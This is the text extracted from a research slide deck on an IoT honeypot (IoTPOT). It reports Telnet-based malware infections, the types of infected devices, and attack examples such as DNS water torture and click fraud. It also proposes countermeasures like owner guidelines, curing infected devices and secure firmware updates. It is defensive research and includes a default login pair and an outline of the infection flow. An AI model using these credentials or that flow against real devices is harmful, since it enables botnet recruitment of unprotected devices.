IoT Vulnerability Analysis Koji Nakao Distingushed Researcher National Institute of Information and Communications technology (NICT)
Contents Observing current IoT Attacks with Analysis Understanding Infected IoT devices How to reduce infected IoT devices including the method for curing IoT devices Our next actions 2
Scanning observation by nicter-atlas Recently, scanning to Port 23 (telenet) is getting larger!! Capturing packets through dark-net in real time basis. Color indicates the protocol types. Atlas All view UDP TCP SYN TCP SYN/ACK TCP Other ICMP Atlas only port23 3
Host Count Packet Count Telnet (23) attacks on Darknet have rocketed 400,000 350,000 300,000 250,000 200,000 150,000 100,000 50,000 0 # of Unique Hosts # of Packets 70,000,000 60,000,000 50,000,000 40,000,000 30,000,000 20,000,000 10,000,000 0 Time 4
Attacking hosts are IoT devices 150,000 attacking IPs 361 models observed in 4 months
Why IoT devices? 24/7 online No AV Weak/Default login passwords with global IP address and open to Internet
We would like to know.. Malware Targets Monetization What kind of malware? How many different kinds? What IoT devices are targeted? What the attackers do after compromising these devices? We propose the first honeypot for IoT
Challenges Honeypot IoT devices listening on Telnet Sandbox: IoTBOX IoT malware of different CPU Architecture ARM MIPSEL SUPERH PPC X86 MIPS Emulating diverse IoT devices Handling to capture malware of different CPU architectures Handle to run malware of different CPU architectures
Emulating different devices 3-way handshake (Options) Welcome message & Login prompt Device Profile Different Banner Banner Interaction Interactions Do Echo, Do NAWS, Will Echo ADSL Router login: NAWS (Negotiate About Window Size) Different Banner Interactions Scanning Internet on port 23 to get different banners Different User ID/Pass Obtain weak/default ID/Pass by web search Different Interactions/Responses Learn from actual devices System with general configuration for embedded devices (e.g. OpenWRT ) id/pass Authentication Authentication root 12345 Different User ID/Pass ARM Command Response... Command Interaction cat /bin/sh corresponding responses Different Responses cat /bin/sh Response 2 MIPS PPC
Unique Host Count IoTPOT results During 122 days of operations [ April 01 to July 31-2015] 250,000 200,000 150,000 100,000 50,000 0 Visit Login Download Malware 900,394 Malware Download Attempts Malware of 11 different CPU architectures 93% of downloaded binaries are new to Virus Total (2015/09)
General flow of Telnet based Malware DL server attacks Malware (binary) Malware (shell) C&C Server Attacker or already infected IoT 2. Series of Telnet Commands 3. Download Malware 1. Login attempts using dictionary attack Scan 23/TCP DoS 4. Attack command
No resource Cache DNS server at ISP Attack Example1: DNS Water Torture attacks 9a3jk.cc.zmr666.com? elirjk.cc.zmr666.com? pujare.cc.zmr666.com? oiu4an.cc.zmr666.com? 9a3jk.cc.zmr666.com? elirjk.cc.zmr666.com? pujare.cc.zmr666.com? oiu4an.cc.zmr666.com? Delayed reply Authoritative DNS for zmr666.com Infected devices
Attack Example-2: Click fraud Infected devices imitates user clicks to advertising web sites Infected Devices
Attack Example-3: Stealing credential from PPV Particular set top boxes are being targeted (such as dreambox) cred enti al
Number of IP Addresses 12000 10000 8000 10734 Looking back on devices visiting IoTPOT More than 60 different types (361 models) of devices visit IoTPOT 6000 4000 2000 4856 We scan back on port 23/TCP and 80/TCP More than 60 type of devices visit us 1391 787 430 411 337 206 206 174 60 20 19 15 11 10 10 9 6 6 0 Device Types
Web interfaces of devices attacking us
Surveillance Group IP Camera DVR Networking Related Devices Router Gateway Modem Bridge Security Appliance Telephone System VoIP Gateway IP Phone GSM Router Analog Phone Adapter Infrastructure Parking Management System LED display control system Categorizing IoT device types without Controls Industrial Control System Solid State Recorder Internet Communication Module Data Acquisition Server BACnet I/O Module Personal Web Camera Personal Video Recorder Home Automation Gateway Broadcasting Facility Digital Video Broadcaster Digital Video Scaler Video Encoder/Decoder Set Top Box Other Heat Pump Fire Alarm System Disk Recording System Optical Imaging Facility Fingerprint Scanner
AS with more than 1,000 infected Devices France Colombia Germany Britain Libya Thailand Israel Italy Phillipine Argen na Malaysia Mexico Taiwan Ukraine Spain China Vietnum Hong Kong Brasil USA India Korea Turkey Russia
Malware Key findings through our challenges At least 6 DDoS malware families target IoT devices via Telnet Malware samples of 11 different CPU architectures are captured 93 % of samples are new to Virus Total One family has quickly evolved to target more devices with as many as 9 different CPU architectures Targets More than 60 types (361 models) of IoT devices are infected Monetization 11 types of DDoS attacks Scans (TCP/23,80,8080,5916 and UDP/ 123,3143) Fake web hosting Click fraud attacks Stealing credential of PPV
Our Target IoT Devices Smart+Connected City Parking Smart+Connected City Lighting Our Target IoT devices Smart+Connected City Traffic Smart+Connected City Location Services Well-managed IoT devices controlled by IoT Services Less-Controlled IoT devices (Nora-IoT) owned by Individuals
IoT Management Process for Less-controlled devices ANALYSIS IoT behaviors MONITORING IoT devices EXECUTION of IoT security controls INTELLIGENCE IoT management
Security Controls for lesscontrolled IoT devices 1. Awareness for IoT device owner (individual) Use of appropriate ID and Password Guideline 2. IoT devices venders - Stop using Telenet (port 23) in order to avoid infections of malwares for new purchase of IoT devices; - Implement module/function for updating software/firmware. 3. Less-controlled IoT devices already in use - Removing malwares from infected IoT, or stop activating malwares (deletion of registry, exe, or scheduler); - Providing remote software update functions.
1) IoT security guideline for IoT device owner (example) Guide-1: Be careful about Initial Setting of the device - Use of appropriate ID/Password - Close unnecessary ports Guide-2: When stop using the devices, switch off the power Guide-3: When disposing the devices, data stored in the devices should be deleted Guide-4: Excuse to purchase the IoT devises without any user-support by vendor
3) Curing IoT devices IoT Honey SCAN port 23 from IoT (A) A s IoT finger-print Curing IoT device (A) Remove/stop malware Infected IoT device (A) IoT devices venders or IoT integrated maintenance center
Secure Remote Updates for IoT software/firmware ITS : General model of networked vehicle can be an example for IoT software update. Aftermarket Information Device Supplier Communication Path Car Manufacturer / Garage center....... Update Server / log database Communication Path Vehicle Mobile Gateway (Head Unit) On-board Information Device Power Management Control ECU Seat Belt Control ECU Driving Support ECU Parking Assist ECU Skid Control ECU etc.,
An example of ITS software remote update procedure.. 2. Request of diagnose of software status 3. Result of diagnose with software status 4. Report of results of ECUs in a vehicle 5. Receipt for submit of diagnose report 7. Request of update module 8. Update module is provided 10. Notification to User (driver) for Updates 11. Confirmation for the update 12. Request for updates to ECUs 13. Results for updates in ECUs 14. Report of application of the update 15. Conformation from the Update server
Our next Actions 1. Cyber-security information captured by our IoThoneypot should be correctly and appropriately shared with right stakeholders; 2. Remote curing method should be technologically investigated; 3. Investigate IoT software and firmware update method and procedure should be designed and evaluated; 4. Support to develop IoT security guidelines for IoT device owner, IoT service provider and IoT device developer.